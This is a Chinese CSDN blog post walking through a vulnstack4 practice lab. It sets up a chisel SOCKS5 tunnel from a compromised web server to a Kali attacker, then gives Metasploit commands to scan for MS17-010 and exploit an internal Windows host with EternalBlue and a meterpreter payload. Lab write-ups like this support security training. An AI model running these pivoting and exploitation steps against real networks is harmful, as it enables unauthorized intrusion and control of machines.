vulnstack4渗透-内网篇

最新推荐文章于 2023-12-29 16:22:58 发布
最新推荐文章于 2023-12-29 16:22:58 发布
阅读量658 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51441054/article/details/124548325
版权
chisel+msf攻入内网在kali上下载chisel再上传到Ubuntu上目标服务器开启服务端./chisel_1.7.6_linux_amd64 server -p 2333 --socks5攻击机kali开启客户端./chisel_1.7.6_linux_amd64 client 192.168.142.139:2333 socks攻击机1080端口开启了socks5监听。即实现将被拿下的目标web机上2333端口的流量转发到攻击机kali的1080端口。永.
摘要由CSDN通过智能技术生成

 chisel+msf攻入内网

在kali上下载chisel再上传到Ubuntu上

目标服务器开启服务端

./chisel_1.7.6_linux_amd64 server -p 2333 --socks5

攻击机kali开启客户端

./chisel_1.7.6_linux_amd64 client 192.168.142.139:2333 socks

攻击机1080端口开启了socks5监听。即实现将被拿下的目标web机上2333端口的流量转发到攻击机kali的1080端口。

永恒之蓝横向渗透攻击

search ms17_010

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.183.0/24

set threads 50

先扫描ip哪些存在此漏洞,发现192.168.183.1,192.168.183.128两个ip存在

对192.168.183.128进行攻击

set Proxies socks5:127.0.0.1:1080
     #msf全局把代理指向127.0.0.1:1080(攻击机1080端口进行socks5监听)
use exploit/windows/smb/ms17_010_eternalblue   #加载渗透攻击模块
set payload windows/x64/meterpreter/bind_tcp   #因为使用代理所以正向监听
                                                              
set  AutoRunScript post/windows/manage/migrate  #自动化后渗透测试,执行
                                                                 #   一次就可以获得对目标的控制权限
set rhost    192.168.183.128 #设置内网域成员为目标机
set lport 4444  #设置监听端口
run

最低0.47元/天 解锁文章
挖洞的浅浅
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnstack4渗透-
weixin_51441054的博客
04-20 3085
环境搭建 靶机:ubuntu:ubuntu(web服务器 卡1:192.168.142.139(模拟外) 卡2:192.168.183.130(内)) 域成员机器:douser:Dotest123(192.168.183.128)win7 DC:administrator:admin123,.(192.168.183.130)windowsserver2008 kali攻击机:192.168.142.134(模拟外) 先对web靶机进行信息收集 发现一个ssh服...
Windows6.1-KB2621440-x64.zip
01-25
文件解压缩,放到服务器执行安装,然后重启。 文件是修补漏洞MS12-020,CVE-2012-0002
win2012r2下微软杀毒软件SCEP不能手动更新
yayulo的专栏
10-20 1456
win2012r2下安装的微软杀毒软件SCEP不能手动更新;如果卸载之后重装,它装完后能够自动 更新到最新版本;一点手动更新病毒库和间谍软件定义就不行。其它操作系统如win2008r2和win7下安装的SCEP更新正常,随时可以手动更新。 解决方法:进入windows更新设置里,把“更新windows时提供其它Microsoft产品的更新”,检查更新,把SCEP的相关补丁更新后,SCEP病毒库和间谍软件更新就正常了,随时可手动更新。 ...
【思考】windows补丁提权的疑问
Websec
12-21 1299
1、一般来说渗透人员拿到一台windows机器是普通权限的话,首先是需要对机器进行信息收集然后考虑提权。提权的话前期肯定是需要对比补丁号去看看对应的漏洞。 具体对比机器的补丁是否存在漏洞的话,可参考这个地址:https://www.cnblogs.com/xiaozi/p/12600258.html 2、但是问题来了,实际上只通过windows的补丁号去判断的话是不准确的,因为微软的每一个安全漏洞受影响的产品和版本不一样,所以他们会根据不同的产品、版本发布多个KB安全更新补丁(编号不一样)。有时候.
渗透Vulnstack4靶场的全方位打法
xf555er的博客
12-29 1536
MS14-068是一个著名的Windows Kerberos安全漏洞,允许攻击者篡改Kerberos票据,从而获取非法提权。这个漏洞特别影响Windows域控制器,能让攻击者伪造Kerberos票据,获取域内几乎任意账户的权限,包括域管理员权限。这使得攻击者可以在络中随意访问和控制资源。
渗透-反弹shell.pdf
10-28
这是一份学习笔记,各个文章的摘抄整合。比较全面的反弹shell方法
ISC-渗透 -最终版.pdf
最新发布
04-08
ISC-渗透 -最终版
渗透测试-客户端渗透.pdf
02-25
《Metasploit渗透测试魔鬼训练营》读书笔记文档,是在我看书的过程中对书中理论和一些实践的总结。
sensitivefilescan-master-渗透的工具
07-14
【标题】"sensitivefilescan-master-渗透的工具" 涉及的主要知识点是络安全中的内渗透测试,这是一种用于评估企业内部络安全性的重要技术。内渗透测试是模拟黑客攻击,寻找并修复组织内部络的安全漏洞...
Windows6.1-KB2621440-x64.rar
08-03
Windows常用补丁,如果需要请下载。
[HACK学习呀] - 2021-01-30 内渗透|Chisel内穿透工具1
08-03
一、chisel工具介绍 二、chisel工具下载使用 三、chisel隧道搭建
渗透测试-外链.pdf
05-04
渗透测试-外链.pdf
靶场复现系列--vulnstack 4
梦之旅行地
12-17 1750
一、前言 也不知道是我运气差还是怎么回事,用vmw搭靶场就是搭不起来,遇到各种问题,后来换成virtual box后解决几个问题就可以了。 第一个问题,虚拟机导入后卡最好重新配下,不然容易报卡的错误 第二个问题,启动docker报错,web服务器(ubuntu)用户未加入docker组,将ubuntu用户加入docker组后,重启就可以通过docker构建容器了,下面是加入docker组的命令 sudo gpasswd -a ${USER} docker 二、实践 1.拓扑 备注:这图片直接在靶场
红日安全ATT&CK靶机实战系列之vulnstack4
黑白的博客
04-25 7904
声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 边下载着,可以开始vmware的络配置 有两个段,外段是我自己设置的桥接模式192.168.31.1/24,内段,vmware加一个卡VMnet3,192.168.183.1/24 和前面的大同小异,我这里就不细说了看过系列文章的应该都已经很清楚这种络结构了,我直接贴图吧 桥接的就是攻击机与边界服务器的
红日靶机vulnstack04【半总结】
qq_45300786的博客
10-06 510
这次环境是3台机器, web服务器:000000 、DC:000000ydc. 、 win7 web服务器改ip有点麻烦,因为需要root用户才能改,给的ubuntu改不了。 所以我就进入高级模式下,修改了root用户的密码 关于虚拟机没有ipIP解决方案 然后再切到root用户修改ip win7 这台机器最麻烦,因为UAC开启最高模式,所以无论执行什么东西,都要输入账号密码 这里我的思路是先用msf的永恒之蓝拿到shell,然后再用下面这个链接去绕过UAC,提权为system权限。然后利用这个sy
靶场vulnstack4内渗透
weixin_71169068的博客
11-18 1016
靶场vulnstack4内渗透
ATT&CK实战系列—红队实战-4
Beret-81的博客
04-27 1453
0、靶场介绍 靶场下载、配置参考:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 靶场配置后需要自行开启 vulhub 里面的三个漏洞。 1、信息收集 2、漏洞分析 该阶段为漏洞挖掘、漏洞扫描、漏洞验证 2.1 struts2 漏洞 struts2 漏洞检查工具: https://github.com/HatBoy/Struts2-Scan https://github.com/shack2/Struts2VulsTools https://git
vulnstack域环境靶场(四)
BROTHERYY的博客
12-09 1471
环境搭建 进入Ubuntu的web虚拟机,ubuntu为我们的web环境,其中的web环境需要手动开启,全部为docker环境,需要启动的环境分别为:s2-045、CVE-2017-12615、cve-2018-12613,启动方法如下: sudo su ubuntu docker-compose build docker-compose up 环境全部开启效果如下: 信息搜集 通过nmap发现主机开启以下服务,访问phpmyadmin属于未授权,直接就登录了 ...
渗透--DNS隧道
05-16
1. 禁止内主机直接访问外部DNS服务器,只允许内主机访问内部DNS服务器。 2. 配置内部DNS服务器,限制DNS请求和响应中的域名字段长度,防止DNS隧道传输数据。 3. 部署DNS防火墙,对DNS流量进行监控和过滤,防止...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值